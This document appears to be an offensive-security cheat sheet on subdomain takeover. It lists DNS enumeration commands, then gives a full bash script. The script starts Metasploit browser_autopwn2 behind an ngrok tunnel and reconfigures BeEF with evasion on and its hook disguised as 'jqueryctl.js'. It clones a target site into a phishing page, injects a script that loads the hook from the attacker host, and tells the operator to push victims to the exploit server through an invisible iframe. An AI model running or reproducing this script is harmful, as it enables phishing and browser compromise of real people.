Subdomain Takeover

Check List

• Enumerate all possible domains (previous and current).

• Identify forgotten or misconfigured domains.

Cheat Sheet

Subdomain Recon

DNS Recon

DNSdumpster

DNSdumpster.com - dns recon and research, find and lookup dns records

Dig

dig CNAME subdomain.$WEBSITE

Amass

amass enum -d $WEBSITE

DNSEnum

dnsenum $WEBSITE

DNSRecon

dnsrecon -d $WEBSITE

Sublist3r

sublist3r -d $WEBSITE

Host

Recon Sub

host subdomain.$WEBSITE

Whois

Recon IP

whois $TARGET | grep "OrgName"

can-i-take-over-xyz

Checklist Providers

GitHub - EdOverflow/can-i-take-over-xyz: "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.GitHub

BeEF

Create Script

sudo nano takeover.sh

#!/bin/bash

RED='\e[1;31m'
GREEN='\e[1;32m'
YELLOW='\e[1;33m'
CYAN='\e[1;36m'
RESET='\e[0m'
$1

# Check for ROOT
if [ "$(id -u)" != "0" ]; then
    printf "${RED}[X] Please run as ROOT...\n"
    printf "${GREEN}[*] sudo ./takeover.sh \$URL\n"
    exit 0
elif [ "$#" != "1" ]; then
    printf "${RED}[X] Please arg URL...\n"
    printf "${GREEN}[*] sudo ./takeover.sh \$URL\n"
    exit 0
else
    # Get current user and LAN IP address
    LAN=$(hostname -I | awk '{print $1}')
    WAN=$(curl -s https://api.ipify.org)
    pkill -f "ngrok" >/dev/null 2>&1
    pkill -f "ruby" >/dev/null 2>&1
fi

# Run Ngrok
sleep 2
msfconsole -qx "load msgrpc ServerHost=$LAN Pass=abc123 SSL=y;use auxiliary/server/browser_autopwn2;set LHOST $WAN;set URIPATH /pwn;run -z" >/dev/null 2>&1 &
sleep 2
ngrok http 3000 >/dev/null 2>&1 &
sleep 5
NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')
printf "${GREEN}[*] ngrok started successfully...${RESET}\n"

# Config BeEF
if grep -q "https: false" /usr/share/beef-xss/config.yaml; then
    sed -i -e 's|user:   "beef"|user:   "unk9vvn"|g' \
           -e 's|passwd: "beef"|passwd: "00980098"|g' \
           -e 's|# public:|public:|g' \
           -e 's|#     host: "" # public|     host: "'$NGHOST'" # public|' \
           -e 's|#     port: "" # public|     port: "443" # public|g' \
           -e 's|#     https: false|     https: true|g' \
           -e 's|allow_reverse_proxy: false|allow_reverse_proxy: true|g' \
           -e 's|hook.js|jqueryctl.js|g' \
           -e 's|BEEFHOOK|UNKSESSION|g' /usr/share/beef-xss/config.yaml
    sed -i -e 's|enable: false|enable: true|g' \
           -e 's|host: "127.0.0.1"|host: "'$LAN'"|g' \
           -e 's|callback_host: "127.0.0.1"|callback_host: "'$LAN'"|g' \
           -e 's|auto_msfrpcd: false|auto_msfrpcd: true|g' /usr/share/beef-xss/extensions/metasploit/config.yaml
    sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/modules/metasploit/browser_autopwn/config.yaml
    sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/extensions/evasion/config.yaml
else
    sed -i -e 's|user:   "beef"|user:   "unk9vvn"|g' \
           -e 's|passwd: "beef"|passwd: "00980098"|g' \
           -e 's|# public:|public:|g' \
           -e 's|host: ".*" # public|host: "'$NGHOST'" # public|' \
           -e 's|port: ".*" # public|port: "443" # public|g' \
           -e 's|https: false|https: true|g' \
           -e 's|allow_reverse_proxy: false|allow_reverse_proxy: true|g' \
           -e 's|hook.js|jqueryctl.js|g' \
           -e 's|BEEFHOOK|UNKSESSION|g' /usr/share/beef-xss/config.yaml
    sed -i -e 's|enable: false|enable: true|g' \
           -e 's|host: ".*"|host: "'$LAN'"|g' \
           -e 's|callback_host: ".*"|callback_host: "'$LAN'"|g' \
           -e 's|auto_msfrpcd: false|auto_msfrpcd: true|g' /usr/share/beef-xss/extensions/metasploit/config.yaml
    sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/modules/metasploit/browser_autopwn/config.yaml
    sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/extensions/evasion/config.yaml
fi
printf "${GREEN}[*] BeEF with new configuration...${RESET}\n"

# Start BeEF XSS framework
cd /usr/share/beef-xss && ./beef -x >/dev/null 2>&1 &

# Create the Phishing Page
wget -O ~/index.html -c -k -q -U \
"Mozilla/5.0 (Macintosh; Intel MacOS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" $URL

# inject script beef
sed -i "s|</body>|<script>function myFunction(){var x = document.createElement('SCRIPT');x.src='https://${NGHOST}/jqueryctl.js';document.body.appendChild(x);};myFunction();</script>|g" ~/index.html

clear
printf "\n\n"
printf "${YELLOW}Save Phishing Page: ~/index.html"
printf "\n"
printf "${CYAN}BeEF Panel: https://${NGHOST}/ui/panel${RESET}\n"
printf "${CYAN}BeEF USER: unk9vvn${RESET}\n"
printf "${CYAN}BeEF PASS: 00980098${RESET}\n"
printf "\n"
printf "${GREEN}BeEF Panel > Commands > Misc > Create Invisible Iframe > URL: http://$WAN:8080/pwn > Execute${RESET}\n"

Script Run

sudo chmod +x takeover.sh;sudo ./takeover.sh